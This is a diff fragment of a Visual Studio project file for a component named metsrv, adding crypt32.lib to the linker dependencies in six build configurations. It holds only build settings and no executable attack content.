<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -294,7 +294,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -355,7 +355,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -419,7 +419,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -486,7 +486,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -553,7 +553,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -619,7 +619,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
|
||||
Loading…
Reference in New Issue
Block a user